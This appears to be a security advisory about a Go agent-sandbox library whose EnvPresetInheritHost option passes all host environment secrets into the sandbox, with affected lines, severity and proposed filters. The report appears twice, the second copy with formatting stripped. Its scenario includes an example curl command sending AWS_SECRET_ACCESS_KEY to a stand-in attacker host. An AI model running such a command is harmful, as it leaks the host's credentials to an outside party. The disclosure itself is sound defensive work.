Summary
When Options.EnvPreset = EnvPresetInheritHost is set, sandbox/session.go's hostEnvMap() copies the entire host process environment into the sandbox with zero filtering. Any secret present in the host environment — AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN, DATABASE_URL, OPENAI_API_KEY, etc. — becomes visible to code running inside the sandbox.
Affected code
Scenario
An AI agent framework embeds agentic-bash and uses EnvPresetInheritHost so the agent can use the same HOME and PATH as the host. The host process is authenticated to AWS. Inside the sandbox:
echo $AWS_SECRET_ACCESS_KEY # prints the real AWS secret key
curl https://exfil.attacker.com/?k=$AWS_SECRET_ACCESS_KEY # exfiltrates it
Impact
If the sandbox is used to run untrusted or partially-trusted code with EnvPresetInheritHost, all host credentials are exposed. Combined with network access (--network allow, the default), this enables trivial credential exfiltration.
This is a design choice, not a pure bug — but it is a significant footgun with no guardrails.
Fix / Mitigations
- Emit a runtime warning when
EnvPresetInheritHost is used, listing common sensitive variable patterns (*_KEY, *_TOKEN, *_SECRET, *_PASSWORD)
- Add a
SensitiveEnvFilter option: A list of patterns to strip from inherited env before passing to the sandbox
- Documentation: Add a prominent warning in the
Options.EnvPreset godoc and README that EnvPresetInheritHost exposes all host secrets to sandbox code
- Default to
EnvPresetLinux: The current default is already EnvPresetLinux (clean env), which is correct. But this should be called out explicitly as the secure default.
Severity
Low (by itself) — this is an opt-in preset that users choose. However, combined with other issues (subprocess escape, network allow), it becomes a High-severity data exfiltration vector.
Summary
When
Options.EnvPreset = EnvPresetInheritHostis set,sandbox/session.go'shostEnvMap()copies the entire host process environment into the sandbox with zero filtering. Any secret present in the host environment —AWS_SECRET_ACCESS_KEY,GITHUB_TOKEN,DATABASE_URL,OPENAI_API_KEY, etc. — becomes visible to code running inside the sandbox.Affected code
sandbox/session.go:50-52— unconditionalenv = hostEnvMap()sandbox/session.go:11-20—hostEnvMap()copies allos.Environ()entriesScenario
An AI agent framework embeds
agentic-bashand usesEnvPresetInheritHostso the agent can use the sameHOMEandPATHas the host. The host process is authenticated to AWS. Inside the sandbox:Impact
If the sandbox is used to run untrusted or partially-trusted code with
EnvPresetInheritHost, all host credentials are exposed. Combined with network access (--network allow, the default), this enables trivial credential exfiltration.This is a design choice, not a pure bug — but it is a significant footgun with no guardrails.
Fix / Mitigations
EnvPresetInheritHostis used, listing common sensitive variable patterns (*_KEY,*_TOKEN,*_SECRET,*_PASSWORD)SensitiveEnvFilteroption: A list of patterns to strip from inherited env before passing to the sandboxOptions.EnvPresetgodoc and README thatEnvPresetInheritHostexposes all host secrets to sandbox codeEnvPresetLinux: The current default is alreadyEnvPresetLinux(clean env), which is correct. But this should be called out explicitly as the secure default.Severity
Low (by itself) — this is an opt-in preset that users choose. However, combined with other issues (subprocess escape, network allow), it becomes a High-severity data exfiltration vector.